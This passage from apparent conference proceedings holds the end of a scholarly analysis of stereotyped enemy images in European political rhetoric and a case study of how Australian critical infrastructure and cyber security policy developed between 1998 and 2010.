The text reads as a collection of dehumanizing features. The enemy is described as an unclean animal –
a dog, which in its negative aspect signifies enslavement and servility in obeying a master. It is
contrasted with the image of the Self as a powerful, independent bear figure, which, incidentally, is the
emblematic animal of Finland, and with the image of pure white stars. Other typical features are the de-individualising
mass-scale presence and ensuing numerical superiority, which of course spells qualitative
inferiority. Furthermore, the eastern enemy is pictured as cruel and merciless (“iron-shod feet”), morally and
culturally below Us. Its animal nature and physical inferiority are associated with aimless loitering and sexual
promiscuity, resulting in an uncontrolled birth rate and ever-expanding population, lack of discipline and
greediness. ‘Ruskies’ as Asians represent a sphere of non-humanity and non-culture (Karemaa 1998;
Vuorinen 2005b: 256–259). The image of the eastern hordes spilling over poor defenceless Europe
originated in the 18th and 19th centuries in Sweden and central Europe, and has been repeated within
nationalist discourses many times since (Harle 2000: 68–71). From the German/Nazi point of view
Russia appeared as an uncultured, under-developed territory, whose decline was due to the Slavic
Russians’ inability to govern a state by themselves (Vuorinen 2010b).
An ancient northern enemy type is the half-legendary Vikings: tall, strong, heavily armed Norsemen,
who raided the coastal villages of Europe, robbing and burning and taking slaves, leaving behind pillage
and ruin (Zilliacus 1989: 183–192). A later representative of the Northern/Nordic enemy is the blond and
muscular Aryan German idealised by Nazi ideologues (Paavolainen 1975: 54, 206–212, 233–247). From
the point of view of the Slavic peoples this was a western enemy, and it also fits that image.
It is interesting to note that Vikings and Germans (Schivelbusch 2004: 32–33) are pictured similarly
regardless of whether they are perceived as heroes or as enemies. When recounting his stay, as a
visiting author, in the Third Reich, Olavi Paavolainen registers several such double images in his
enthusiastic but also ironic book Kolmannen Valtakunnan vieraana (As a Guest of the Third Reich, 1936):
“The one hundred percent masculine, iron-hard man-youth of the New Germany […] radiates […] an
unusual spiritual discipline and a hard, honest manliness”. The Aryan ideal “invoked an image […] of a
powerful, beautiful and healthy generation, free of any depressing notions of guilt and sin. The Third
Reich wishes to breed Nordic Hellenes, perfect of race and body, to be the noblest of Europeans”
(Paavolainen 1975: 32, 187).
A favourite southern enemy of present-day Europe, Islam, closely resembles its eastern counterpart
in its rapidly expanding population and consequent expansion – in the early 21st-century imagery the big
Muslim families would all but drown Europe – and as a category belonging to the zone of non-civilisation.
Their religion is essentially non-European. Their unbridled political and other passions are described as
those of an uncultured beast rather than a human being, let alone an adult human. The burqa-clad
woman of Islam is seen as legally incompetent, by status resembling a minor – a victim of her
religion, who has been denied societal and moral adulthood. An Arab man is stereotyped either as a
woman-beater whose psychological development was arrested at puberty, as a religious leader spouting
forth empty threats, or as a politically immature al-Qaida terrorist (Kuusisto 2002). The absoluteness of
this image, and the inherent self-understanding, were crystallised by Tony Blair in a post-9/11 speech:
This mass terrorism is the new evil in our world today. It is perpetrated by fanatics who are
utterly indifferent to the sanctity of human life and we, the democracies of this world, are
going to have to come together to fight it together and eradicate this evil completely from our
world. […] This is not a battle between the United States and terrorism, but between the free
and democratic world and terrorism (Blair 2001).
The western enemy differs significantly from the others, and is therefore discussed last. It is also
much more modern than the previous three. From the point of view of the definer/observer it is situated
not below but above the Self. Accordingly, it represents a super-culture. It has material superiority, large
amounts of natural resources and/or a monopoly on exploiting them, lots of money, high technology and
superior, e.g. nuclear, weapons.
During WW II the archetypal western enemy, at least from the perspective of Central and Eastern
Europe, was Nazi Germany, with its, for a time, seemingly insurmountable resources, technological
and armament superiority, accentuated by a certain image of physical superiority resulting from a period
of relative prosperity and put forth by means of innovative showmanship (e.g. Kershaw 2000, passim). In
the post-war world the so-called Ugly American (originally the title of a political novel by Eugene Burdick
and William Lederer, published in 1958 and representing the arrogant behaviour of Americans abroad)
came to stand for a person whose actions are motivated by selfish economic calculations, who disdains
all other cultures and practices than his own, and whose final aim is to put his own nation into a position
of world domination.
From a non-European perspective the colonial overlords (Said 1978: 1–28 and passim) and the present-day
USA as the self-styled champion of democracy trying to induce disobedient nations to accept ‘our’
values by force (Wuori 2002: 162–163) also represent the western enemy.
4. Enemies within the shared society: Sociological and politological cases
The enemies whom Harle (2000: 35) describes as intimate enemies are those who are considered aliens
or outsiders by the defining/observing in-group Self, but nevertheless live and act within the same
society. In the broad sense of the word they can be defined as political enemies. According to Carl
Schmitt, a political movement comes into being by identifying (establishing) an enemy, an outside group
that is seen to threaten its very existence. Excluding a chosen Other is thus the founding act of any
political community. It enables the in-group to recognise its own identity, which of course is defined as an
opposite of the enemy’s, in Schmitt’s vocabulary called a constitutive enemy (Schmitt 1996: 26–39, 46–
47, 54, 64–68, 74, 79).
Societal enemies from above and below date back millennia, whereas the enemies from the right and
the left – though originating as terms from the time of the 1789 French revolution – belong to the modern
political maps of the 19th and 20th centuries. The above/below divide is present also in the division of
society <strong>in</strong>to lower, middle and upper classes; the latter division <strong>in</strong>to three <strong>in</strong>cludes the central or middle<br />
group, which <strong>in</strong> the former is only implied at.<br />
An enemy from above is a living paradox. It is represented as superior and quasi-invincible, but also, very pronouncedly, as vincible: behind its seeming grandness looms qualitative inferiority. Its non-cultureness manifests as decadence and/or as a hyper-culture, e.g. an accentuation of formalities. An enemy from above has, in the past, usurped the power, property and resources that rightfully belong to Us, and through them it has built itself a superior position. It oppresses Us and is haughty, arrogant, proud, snobbish and hierarchy-oriented. As a reactionary force it slows down progress and maliciously disrupts the development towards 'our' chosen future.
The classic case of an enemy from above is the 19th-century nobleman, an icon of repressive mastership and political reaction, as portrayed by his rivals and soon-to-be successors, the bourgeois professionals of the press. A conflict between the declining aristocracy and the upwardly mobile Bildungsbürgertum/intelligentsia was presented to the public as a conflict between the nobility and the people (Vuorinen 2005a; Vuorinen 2010a; Taylor 2004). Another case in point is the made-to-order conglomerate enemy tailored for the emergent Soviet Union, consisting of the imperial court, nobility, clergy, bourgeoisie and kulaks (Harle 2000: 111–117).
Enemies from below stand literally lower than the spectator, and are by status non-cultural beings: unlearned or mentally slow, resembling a child, a savage or an animal. They disrespect 'our' hierarchies and norms, are listless, deceitful, defiant and demanding, and entertain big ideas about themselves. They covet 'our' status, power, property and education and try to wrench them from us, do not submit to our guidance and dissociate themselves from our values. This category includes groups of low social origin who criticize an elite group for bad morals or poor administration, e.g. popular religious revivals and grass-roots democratic movements (Huhta 2001; Vuorinen 2005b: 251–252; Bränn 2004).
The enemy from the right is related to the enemy from above. An enemy from above (right) tends to embody not only abstract societal power, as in the case of the nobility, but also the more concrete economic power. The most recent historical case is the bourgeoisie of the 1960s–70s, the enemy of the leftist youth movements of the era. It was created by late-19th-century Marxists, whose agitators urged the revolutionary workers to wrest power from their masters, who deprived them of the fruits of their labour, of happiness, rest and education (Ehrnrooth 1992: 127–189).
The classical case of this enemy is the Whites of many early 20th-century civil wars. The term 'Whites' was not used quite as widely as 'Reds' to denote a political tendency, yet the pair figured not only in the Russian but also in the Finnish, Estonian and German civil wars. Otto-Ville Kuusinen, a Finnish communist, described the victorious Whites like this:
In addition to the massacres, the bourgeoisie killed the prisoners [Red prison-camp inmates] also by letting them starve to death. For those god-fearing monarchists and joint-stock company capitalists that was obviously the most orgiastic kind of revenge: the workers, proud of their achievement as the generators of riches and thus their rightful owners, now imprisoned and writhing in hunger, turning blue and breathing their last. Seeing this, the fine lords of stock capital can best digest their fat, whet their appetite and revel in their superhuman power (quoted in Paavolainen 1967: 296–297).
An enemy from the left relates to an enemy from below. The combination enemy from below (left) is fairly common; all revolutionaries belong to this category. The Finnish Whites of 1918 saw the Reds as tainted by ideological filth; communism was called a red epidemic. Their cruelty was emphasized by animal metaphors and graphic descriptions of rape and mutilation (Paavolainen 1966: 245–271; Vuorinen 2005b: 253–255). White newspapers revelled in stories, heavily spiced with reversed religious symbolism, about how the Reds tortured country clergymen. One had been crucified on the altar; on the wall behind him was written, in blood, "May your God help you". Another's body was propped up with bayonets, eyes pierced, spectacles on and Bible in hand. A third had first been beaten senseless, then forced to watch as the Reds raped his wife and four daughters, and was afterwards burned along with his rectory (Paavolainen 1966: 251, 270).
Other combinations of political compass points are more problematic. Enemies from above (left) might be the youngsters of well-to-do families who in the 1960s and '70s rebelled against the older generation while parading picturesque leftist rhetoric. A 19th-century case in point is the progressive nationalist-democratic movement, proclaiming for a time to be "of the people and for the people", but soon landing in positions well above the people, and seen by its opponents as sentimental, overly ideological and incompetent.
From below (right) come the mass movements of the extreme right: Nazis, fascists, Francoists. The combination is embodied by the German Übermensch, whose physical superiority combines discipline with the subordination of the individual to the whole. A hallmark of this mentality is the uniform, hiding the individual in a multiplicity and dramatising mass scale and unity (Paavolainen 1975: 254–270).
5. Internal enemies: shirkers and traitors
The most unpredictable, and therefore the most suspect, enemies are those who by their looks and manners cannot be separated from Us, who hide among Us and whom we treat as one of Us, but who may eventually betray us and thus, from the beginning, were not worth our trust.
The risks caused by internal enemies are at their direst during wartime, when the contribution of every citizen is needed to defend the nation. Wartime freeloaders and troublemakers, those who fail to do their duty while others risk their lives, can be divided into further categories, including complainers, shirkers, mutineers and deserters within the ranks of the army, defeatists who weaken morale on the home front, and profiteers who unscrupulously exploit the war economy. The cross-border, fifth-column forms of desertion include treason and collaboration with the enemy, while domestic treason typically manifests as revolt (Vuorinen 2010b). A special subtype, sexual treason, is committed by 'Our women' who jeopardize the morale of the nation by consorting with the enemy; e.g. in France after WW II many 'brides of the Germans' were publicly punished (Karemaa 1998: 23–24, 66–67; Junila 2000: 146–165; Virgili 2002).
Internal enemies also come in peacetime varieties. Those incapable of carrying full responsibility, known as weak links, put the survival of the group, e.g. the nation, at peril. The morally slack, the mentally ill, the disabled and alcohol abusers were often condemned as public enemies by the social reformists of the late 19th and early 20th century (Uimonen 1999; Mattila 2005). Peacetime freeloaders are those who choose not to work; an industrious sub-species of this type is the speculator who benefits from the work of others. The civilian shirkers come in two varieties: those who won't pay taxes but exploit the social benefits, and those who by their choices increase the commonwealth's health-care expenses: alcoholics, drug addicts, tobacco smokers and the obese who avoid exercise. Far more perilous are the peacetime traitors, who violate the bonds of law and loyalty: criminals and terrorists. Under racist regimes, those who consorted with home-grown "racial inferiors" could be condemned as traitors to their race (Vuorinen 2010b).
6. Temporal and eternal enemies: Religion and history
The theological division into heaven and hell will not be discussed here, even though it is considered by some as the core of all rhetoric on good versus evil (Harle 2000: 25–39). Suffice it to note that religious identities have, for millennia, provided an ultimate criterion of division between Us and Them.
In modern secular discourse the division into heaven/hell is sometimes replaced by a sequence of past/present/future. By demonising the past, the present circumstances can be represented as optimal, normal and natural, whereas any deviation from them can be interpreted as harmful and unnatural. Alternative ways to deal with this sequence are the optimistic model, which demonises not only the past but also, and most particularly, the present, and places the better prospects in a utopian future; and the pessimistic, reactionary notion of the past as a golden age, which in turn demonises the impending future.
References
Alapuro, R. (1973) Akateeminen Karjala-seura: ylioppilasliike ja kansa 1920- ja 1930-luvulla, WSOY, Porvoo.
Blair, T. (2001) "Blair calls for world fight against terror", in Guardian, 12 September 2001 (http://www.guardian.co.uk/politics/2001/sep/12/uk.september11).
Bränn, M. (2004) "Axel Olof Freudenthal och den Nyländska avdelningens värdeorientering", in Ahl & Bränn (eds.) 1904: Samlingar utgivna av Nylands Nation XIII, Nylands Nation, Helsingfors, pp. 20–49.
Ehrnrooth, J. (1992) Sanan vallassa, vihan voimalla: sosialistiset vallankumousopit ja niiden vaikutus Suomen työväenliikkeessä 1905–1914, SHS, Helsinki.
Gummerus, K.J. (1970) Ylhäiset ja alhaiset, Gummerus, Jyväskylä.
Hall, S. (1999) Identiteetti, Vastapaino, Tampere.
Harle, V. (2000) The enemy with a thousand faces: the tradition of the other in western political thought and history, Praeger, Westport (Conn.).
Huhta, I. (2001) "Täällä on oikea suomenkansa": körttiläisyyden julkisuuskuva 1880–1918, Suomen kirkkohistoriallinen seura, Helsinki.
Immonen, K. (1987) Ryssästä saa puhua… Neuvostoliitto suomalaisessa julkisuudessa ja kirjat julkisuuden muotona 1918–39, Otava, Helsinki.
Junila, M. (2000) Kotirintaman aseveljeyttä: suomalaisen siviiliväestön ja saksalaisen sotaväen rinnakkainelo Pohjois-Suomessa 1941–1944, SHS, Helsinki.
Kailas, U. (1977) Runoja, WSOY, Porvoo.
Karemaa, O. (1998) Vihollisia, vainoojia, syöpäläisiä: venäläisviha Suomessa 1917–1923, SHS, Helsinki.
Kershaw, I. (2000) Hitler, 1936–45: Nemesis, Penguin, London.
Klinge, M. (1972) "Vihan veljistä" valtiososialismiin: yhteiskunnallisia ja kansallisia näkemyksiä 1910- ja 1920-luvuilta, WSOY, Porvoo.
Kuusisto, R. (2002) "Ei mitään hätää! Terrorismin vastaisen sotamme 'virhetulkinnat' ja 'oikeat perustelut'", in First we take Manhattan – terrorismi ja uusi maailmanjärjestys, Like, Helsinki, pp. 71–82.
Luostarinen, H. (1986) Perivihollinen: Suomen oikeistolehdistön Neuvostoliittoa koskeva viholliskuva sodassa 1941–44: tausta ja sisältö, Vastapaino, Tampere.
Mattila, M. (2005) "Sterilointipolitiikka ja romanit Suomessa vuosina 1950–1970", in Häkkinen et al. (eds.), Vieraat kulkijat – tutut talot: näkökulmia etnisyyden ja köyhyyden historiaan Suomessa, SKS, Helsinki.
Mosca, G. (1939) The ruling class: elementi di scienza politica (1896), McGraw-Hill, New York.
Paavolainen, J. (1966, 1967) Poliittiset väkivaltaisuudet Suomessa 1918 I–II, Tammi, Helsinki.
Paavolainen, O. (1975/1936) Kolmannen valtakunnan vieraana, Otava, Helsinki.
Said, E. (1978) Orientalism, Pantheon Books, New York.
Schivelbusch, W. (2004) The culture of defeat: on national trauma, mourning, and recovery, Granta, London.
Tarkiainen, K. (1986) Se vanha vainooja: käsitykset itäisestä naapurista Iivana Julmasta Pietari Suureen, SHS, Helsinki.
Taylor, A. (2004) Lords of Misrule: Hostility to Aristocracy in Late Nineteenth- and Early Twentieth-Century Britain, Palgrave Macmillan, Basingstoke.
Uimonen, M. (1999) Hermostumisen aikakausi: Neuroosit 1800- ja 1900-lukujen vaihteen suomalaisessa lääketieteessä, SHS, Helsinki.
Virgili, F. (2002) Shorn women: gender and punishment in liberation France, Berg, Oxford & New York.
Vuorinen, M. (2005a) "Inventing an Enemy: Bloodsucking Noblemen in Finnish Fiction", in H. Salmi (ed.), History in Words and Images. Proceedings of the Conference on Historical Representation, Turku, pp. 109–121. http://www.hum.utu.fi/historia/2000/
Vuorinen, M. (2005b) "Herrat, hurrit ja ryssän kätyrit – suomalaisuuden vastakuvia", in Pakkasvirta & Saukkonen (eds.), Nationalismit, WSOY, Helsinki, pp. 246–264.
Vuorinen, M. (2010a) Kuviteltu aatelismies: aateluus viholliskuvana ja itseymmärryksenä 1800-luvun Suomessa, SKS, Helsinki.
Vuorinen, M. (2010b) "Mein Kampf revisited: enemy images as inversions of the Self", in D. Remenyi (ed.), Proceedings of the 9th European Conference on Information Warfare and Security, Academic Conferences Limited, Reading.
Wuori, M. (2002) "Maailma järjestyksen kourissa", in First we take Manhattan: terrorismi ja uusin maailmanjärjestys, Like, Helsinki, pp. 152–172.
Zilliacus, V. (1989) Rakas vanha Eurooppa: kulttuurikuvia vuosisatojen varrelta, Tammi, Helsinki.
Australian National Critical Infrastructure Protection: A Case Study
Matthew Warren and Shona Leitch
Deakin University, Australia
mwarren@deakin.edu.au
shona@deakin.edu.au
Abstract: Australia has developed sophisticated national security policies and physical security agencies to protect against current and future security threats associated with critical infrastructure protection and cyber warfare protection. This paper discusses some of the common security risks that face Australia and how government policies and strategies have been developed and changed over time, for example the proposed Australian Homeland Security department. It also discusses the different steps that Australia has undertaken in developing national policies to deal with critical infrastructure protection.
Keywords: critical infrastructure, Australia, policy
1. Introduction
Australia is a modern society and is highly dependent on key critical systems at the national and state level. These key systems have become more dominant as the Information Age has developed. They are grouped together and described as critical infrastructure: infrastructure so vital that its incapacity or destruction would have a debilitating impact on defence and national security (Lewis, 2006). Many of these critical systems are based upon ICT (Information and Communication Technology) systems.
Australia takes ICT security very seriously: it has been estimated that Australian organisations spend between A$1.37 and A$1.74 billion per year on IT security, and the total financial losses due to computer-related security incidents in the 2006 financial year have been estimated at between $595 and $649 million (Australian Institute of Criminology, 2009).
This paper reviews the strategies used by Australia over the past decade, evaluates their differences and discusses the reasons for those differences. Future threats such as cyber warfare, and the steps being proposed to meet them, are also considered. The paper highlights current Australian best practices in critical infrastructure and cyber warfare protection, many of which may be applicable in a European context and provide an informative contrast.
2. The initial view of the Australian Federal Government
The initial focus of Australian Federal Government policy was that critical infrastructure protection was a commercial consideration and related to information security (Busuttil and Warren, 2004). The Federal Government has been aware of the problems that Australian corporations may have in dealing with these new security issues, and has responded by offering advice for corporations. The initial Australian Government advice (AGD, 1998) suggested ways in which organisations could reduce critical infrastructure protection risks (Busuttil and Warren, 2004):
- Organisations should implement protective security measures, such as passwords, in accordance with a defined security standard such as AS/NZS 4444 (now 17799) (Information Security Management);
- Organisations should formally accredit themselves against security standards such as AS/NZS 4444 (17799);
- Organisations should raise awareness among their staff of security issues such as password security and e-commerce risks;
- Organisations should train their staff in how to use computer security systems efficiently and effectively.
This advice was subsequently updated, and in 2004 the Australian Government responded with new security advice (Australian Government, 2004):
- The Australian and New Zealand Standard for Risk Management, AS/NZS 4360:1999, is the standard by which all critical infrastructure will be assessed, to assist with the review of risk management plans for prevention (including security), preparedness, response and recovery (PPRR).
In 2004 the Australian Federal Government formally defined the following: "Critical infrastructure is defined as those physical facilities, supply chains, information technologies and communication networks which, if destroyed, degraded or rendered unavailable for an extended period, would significantly impact on the social or economic well-being of the nation, or affect Australia's ability to conduct national defence and ensure national security" (Australian Government, 2004). In essence this description covers organisations that exist at a government level or at a corporate level (Australian Government, 2004).
Historically, much of Australia's infrastructure was owned and operated by the public sector at the federal, state and local government levels (Smith, 2004); however, the majority of Australia's critical infrastructure has since been privatised and is now under private sector ownership. Consequently, protecting Australia's critical infrastructure requires a higher level of cooperation between all levels of government and the private sector owners. Hence, the federal government has developed a policy for critical infrastructure protection that focuses broadly on the following strategies (Australian Government, 2004; AGD, 2004):
- Identifying critical infrastructures and ascertaining the risk areas;
- Aligning the strategies for reducing potential risk to critical infrastructure;
- Encouraging and developing effective partnerships with state and territory governments and the private sector;
- Advancing both domestic and international best practice for critical infrastructure protection.
As Warren and Leitch (2010) discussed, the Australian Federal Government recognised the importance of crucial systems and developed new industry support mechanisms, in particular the Trusted Information Sharing Network (TISN).
The TISN is a forum in which the owners and operators of critical infrastructure work together by sharing information on security issues which affect critical infrastructure (TISN, 2007). TISN requires the active participation of the owners and operators of critical infrastructure, regulators, professional bodies and industry associations, in cooperation with all levels of government and the public. To ensure this cooperation and coordination, all of these participants should commit to the following set of common fundamental principles of critical infrastructure protection (TISN, 2007; Warren and Leitch, 2010):
- Critical infrastructure protection is centred on the need to minimise risks to public health, safety and confidence, ensure economic security, maintain Australia's international competitiveness and ensure the continuity of government and its services;
- The objectives of critical infrastructure protection are to identify critical infrastructure, analyse vulnerability and interdependence, and protect from, and prepare for, all hazards;
- As not all critical infrastructure can be protected from all threats, appropriate risk management techniques should be used to determine relative severity and duration and the level of protective security, set priorities for the allocation of resources and apply the best mitigation strategies for business continuity;
- The responsibility for managing risk within physical facilities, supply chains, information technologies and communication networks rests primarily with the owners and operators;
- Critical infrastructure protection needs to be undertaken from an 'all hazards approach' with full consideration of interdependencies between businesses, sectors, jurisdictions and government agencies;
- Critical infrastructure protection requires a consistent, cooperative partnership between the owners and operators of critical infrastructure and governments;
- The sharing of information relating to threats and vulnerabilities will assist governments, and owners and operators of critical infrastructure, to better manage risk;
- Care should be taken when referring to national security threats to critical infrastructure, including terrorism, so as to avoid undue concern in the Australian domestic community as well as among potential tourists and investors overseas;
- Stronger research and analysis capabilities can ensure that risk mitigation strategies are tailored to Australia's unique critical infrastructure circumstances.
3. Australia's critical infrastructure – the alternative viewpoint
During the time that the Australian Federal Government defined national policy for critical infrastructure protection, the opposition Australian Labor Party defined its own, very different policy and viewpoint. The following is a time sequence of that policy's development:
2001 – Initial Policies
In October 2001, as a response to the terrorist attacks in New York in September of the same year, the Australian Labor Party (ALP), then the Australian opposition and led by Kim Beazley, proposed a range of national security reforms. The reforms focussed on three main areas (ALP, 2001):
- Improving border security;
- Combating terrorism;
- Improving national security planning.
It was stated that these reforms had previously been in the planning stages, but the first announcement was made only two days after the attack on the World Trade Center. Border security was announced as a high priority, with changes to the coast guard and aviation security regimes uppermost. For the aviation industry this included more counter-terrorism measures, including the Federal Government taking over responsibility for all airport security checks, ensuring a visible presence of officers at airports, and introducing tighter controls on aviation security information by amending current laws and regulations (ALP, 2001).
Rather than concentrating only on the physical security controls which were very much at the forefront of the public's mind in 2001, the ALP also proposed a range of changes and initiatives regarding the protection of Australia's national infrastructure. This focused on the establishment of a Defence Cyber-warfare Task Force, which would use all the elements and agencies of the current defence force to counteract cyber security threats and cyber terrorism attacks.
The strategy proposed by the ALP revolved around the concept of "Homeland Security". This was the first time the term was used in Australia, and the notion of integrating security agencies, expanding the range of activities and including the national infrastructure (transport, electricity, water, communication systems etc.) as the most important elements was a dramatic leap in the protection of Australia from cyber terrorist threats.
2003–2005 – A Period of Reflection
In 2003 the Australian Labor Party was still the country's opposition party. A department of Homeland Security was still being advocated by them, so much so that a shadow Security minister was created whose portfolio encompassed border protection, crime prevention, intelligence-gathering, investigation and prosecution (ALP, 2003), and the Shadow Department of Homeland Security portfolio was set up.
In 2005 the notion of a Homeland <strong>Security</strong> department was still forefront <strong>in</strong> the ALP’s policies as a way to<br />
address the issues of national security and br<strong>in</strong>g together all of Australia’s defence agencies (as was<br />
done dur<strong>in</strong>g the 2000 Olympic Games held <strong>in</strong> Sydney, Australia). They believed that this level of<br />
<strong>in</strong>tegration and cohesion was the only way to truly protect Australia and its citizens from the cont<strong>in</strong>ued<br />
threats and attacks. They outl<strong>in</strong>ed a number of cases which they felt supported this proposal (Beazley,<br />
2005):<br />
The alleged <strong>in</strong>volvement of Sydney Airport baggage handlers <strong>in</strong> an <strong>in</strong>ternational drug traffick<strong>in</strong>g<br />
syndicate. The Australian Federal Police claims baggage handlers were key players <strong>in</strong> a conspiracy<br />
to smuggle coca<strong>in</strong>e worth $15 million <strong>in</strong>to Australia;<br />
Constant warn<strong>in</strong>gs from the Transport Workers’ Union, that the Federal government had been aware<br />
of potential security breaches at Australian airports for at least four years and the TWU’s call for<br />
improved security checks of short term employees and the immediate x-ray screen<strong>in</strong>g of all baggage<br />
and freight;<br />
Passengers’ baggage conta<strong>in</strong><strong>in</strong>g large amounts of narcotics be<strong>in</strong>g diverted to domestic carousels to<br />
avoid Customs <strong>in</strong>spections;<br />
Matthew Warren and Shona Leitch<br />
- 39 security screeners out of 500 employed at the airport have serious criminal convictions, with a further 39 convicted of minor matters;
- Engineers with unauthorised duplicate keys;
- Lack of customs checks on airline staff.

2007 – 2008 From Opposition to Government

The Australian Labor Party in 2007 moved from being the opposition party to forming Government. One of their main policies leading into the Federal election was that they would continue with their long term plan of forming a Department of Homeland Security.

In 2008, the Prime Minister announced that he planned to cancel the ALP’s long term plans to create the new department on the basis that the integration of all the defence agencies would be too “cumbersome” (Franklin and Walters, 2008).

Seven years of planning and proposals had disappeared less than a year after an election due to the complexities of how administration would be dealt with and confusion over how the complex integration could be achieved (Nicholson, 2008).

The fact that the initial plans arose swiftly after the terrorist attacks in September 2001 may pose questions as to whether the plans were ill thought out and borne out of the need to react rather than being a sensible, productive and workable policy.
4. Recent Australian Government strategy

The Australian Federal Government (2008) has identified new security challenges: “it is increasingly evident that the sophistication of our modern community is a source of vulnerability in itself. For example, we are highly dependent on computer and information technology to drive critical industries such as aviation; electricity and water supply; banking and finance; and telecommunications networks. This dependency on information technology makes us potentially vulnerable to cyber attacks that may disrupt the information that increasingly lubricates our economy and system of government” (Rudd, 2008). This public acknowledgement by the Australian Prime Minister, Kevin Rudd, identifies the new security challenges facing critical infrastructure protection and highlights the following security concerns (Rudd, 2008):

- Maintaining Australia’s territorial and border integrity;
- Promoting Australia’s political sovereignty;
- Preserving a cohesive and resilient society and strong economy;
- Protecting Australians and Australian interests both at home and abroad, and
- Promoting a stable, peaceful and prosperous international environment, particularly in the Asia-Pacific region, together with a global rules-based order which enhances Australia’s national interests.

In 2009 the Federal Australian Government responded to the issues regarding cyber security and critical infrastructure by proposing a coherent, government led approach to critical infrastructure protection. The primary objectives identified focus on all areas of Australian society where there are security risks, e.g. that individuals should be aware and take steps to “protect their identities, privacy and finances online” (Australian Government, 2009), and that businesses and the government operate “secure and resilient information and communication technologies” and a trusted electronic operating environment that supports Australia’s national security and maximises the benefits of the digital economy (Australian Government, 2009). The Australian Federal Government has also developed a wide range of new strategic directions to focus Australia’s cyber security programs (Australian Government, 2009):

- Improve the detection, analysis, mitigation and response to sophisticated cyber threats, with a focus on government, critical infrastructure and other systems of national interest;
- Educate and empower all Australians with the information, confidence and practical tools to protect themselves online;
- Partner with business to promote security and resilience in infrastructures, networks, products and services;
- Model best practice in the protection of government ICT systems, including the systems of those transacting with government online;
- Promote a secure, resilient and trusted global electronic operating environment that supports Australia’s national interest;
- Maintain an effective legal framework and enforcement capabilities to target and prosecute cyber crime;
- Promote the development of a skilled cyber security workforce with access to research and development to develop innovative solutions.

As part of the new Australian Federal Government strategy, a number of new bodies have been developed with new capabilities. These include (Australian Government, 2009):

- CERT (Computer Emergency Response Team) Australia. This new Government body has moved to a national level to enable a “more integrated, holistic approach to cyber security across the Australian community”. Some of the previously formed cyber security activities that were undertaken by numerous different agencies, such as the Australian Government’s Computer Emergency Readiness Team (GovCERT), have been combined to form CERT in order to promote a greater (shared) understanding, provide targeted advice and give Australians a single point of contact.
- Cyber Security Operations Centre (CSOC). The core functions of the CSOC are focused mainly on government, infrastructure and critical private sector systems; it aims to be a source for all issues related to awareness (especially the detection of sophisticated threats) and a facility to respond to cyber security risks and problems which are of national importance. Another key aspect of CSOC is that it provides Australian Defence with a cyber warfare capability and provides a resource designed to service all government agencies (DSD, 2011).

The Australian Federal Government has started to refocus away from Critical Infrastructure Protection to Critical Infrastructure Resilience. The Australian Attorney General Robert McClelland announced that “The time has come for the protection mindset to be broadened – to embrace the broader concept of resilience. The aim is to build a more resilient nation – one where all Australians are better able to adapt to change, where we have reduced exposure to risks, and where we are all better able to bounce back from disaster” (TISN, 2010).

The Australian Federal Government in 2010 launched the new Critical Infrastructure Resilience Strategy. The aim of this new strategy is the continued operation of critical infrastructure in the face of all hazards, as this critical infrastructure supports Australia’s national defence and national security and underpins our economic prosperity and social wellbeing. More resilient critical infrastructure will also help to achieve the continued provision of essential services to the community (Australian Government, 2010). This new strategy also deals with new areas such as disaster protection and disaster resilience, and this shift in policy is going to have a major impact upon Australia.
5. Discussion

The major issue facing Australia is the currently adopted distributed model of critical infrastructure protection and decision making, and whether it can effectively manage and secure Australia’s critical infrastructure. Whilst it is commendable that an Australian Federal Government has faced the issue of critical infrastructure and cyber threats, the fact that this approach attempts to cover the entirety of Australia may in itself be problematic. There has been some streamlining of operations by nationalising CERT; however, there are still a number of separate agencies that are involved in this process: the Attorney-General’s Department (AGD), the Australian Communications and Media Authority (ACMA), the Australian Federal Police (AFP), the Australian Security Intelligence Organisation (ASIO), the Defence Signals Directorate (DSD), the Department of Broadband, Communication and the Digital Economy (DBCDE), the Australian Government Information Management Office (AGIMO), the Joint Operating Arrangements (JOA) and the Cyber Security Policy and Coordination (CSPC) Committee. It is clear that there has been an overall Government shift to form two “umbrella” agencies (CERT and CSOC) to monitor, promote and control cyber threats; however, complexity will still arise as there are so many sub agencies involved in this process. In an area such as cyber security, where speed is often of utmost importance to limit damage, the interaction of a large number of other agencies will surely slow
this process down. If a cyber attack occurs in real time against Australia, would these agencies be able to react and make decisions in real time, or would the distributed model actually hinder the decision making process? Another unique issue that relates to Australia is the federated government system, consisting of a federal government and a number of state governments. A key issue is that when an attack occurs against infrastructure at a state level, escalating the decision making process to the Federal government may be slow. This time lag could cause serious consequences and limit the effectiveness of these agencies.

A new factor with the introduction of CSOC is the move away from civilian organisations protecting Australia’s critical infrastructure against cyber security risks towards making defence organisations responsible for this role. This may heighten the chance of attacks against Australia’s critical infrastructure because it could be considered a military target. The major shift in Australian policy is the announcement in 2010 of the move away from Critical Infrastructure Protection to Critical Infrastructure Resilience and the inclusion of natural disaster in the policy. This will have a major impact upon Australia, and the real implications are still yet to emerge, especially with the recent natural disasters in Australia.

6. Conclusion

Australia over the last decade has taken major steps in the protection of its national critical infrastructure. The Australian model is a workable model that has helped to protect Australian critical infrastructure against physical and cyber risks. The issue is whether the distributed model will work in a real time situation and whether the time delays would impact the decision making processes.

A new emerging issue is the focus upon Critical Infrastructure Resilience and the future impact that this may have.
References

Australian Labor Party (ALP) (2001). Labor’s Better Plan For Defence – A Secure Future, Canberra.
Australian Labor Party (ALP) (2003). ALP News Statement – Development of Homeland Security Portfolio, Canberra.
Attorney-General’s Department (AGD) (1998). Report of the Interdepartmental Committee on Protection of the National Information Infrastructure, Available from: http://law.gov.au/publications/niireport/niirpt.pdf, Accessed 10th March, 2007.
Attorney-General’s Department (AGD) (2004). Critical Infrastructure Protection National Strategy, Available from: http://www.nationalsecurity.gov.au, Accessed 10th November, 2007.
Australian Government (2004). Protecting Australia Against Terrorism, Department of the Prime Minister and Cabinet, Barton, ACT.
Australian Government (2009). Cyber Security Strategy, Attorney-General’s Department, Commonwealth of Australia, ISBN 978-1-921241-99-4.
Australian Government (2010). Critical Infrastructure Resilience Strategy, Attorney-General’s Department, Commonwealth of Australia, ISBN 978-1-921725-25-8.
Australian Institute of Criminology (2009). Australian Business Assessment of Computer User Security, ISBN 978-1-921532-35-1.
Beazley, K. (2005). A Nation Unprepared: Australia in the Fourth Year of a Long War, Address to the Sydney Institute, Sydney, 4th August.
Busuttil, T. and Warren, M. (2004). A risk analysis approach to critical information infrastructure protection, Proceedings of the 5th Australian Information Warfare and Security Conference, Perth, Western Australia.
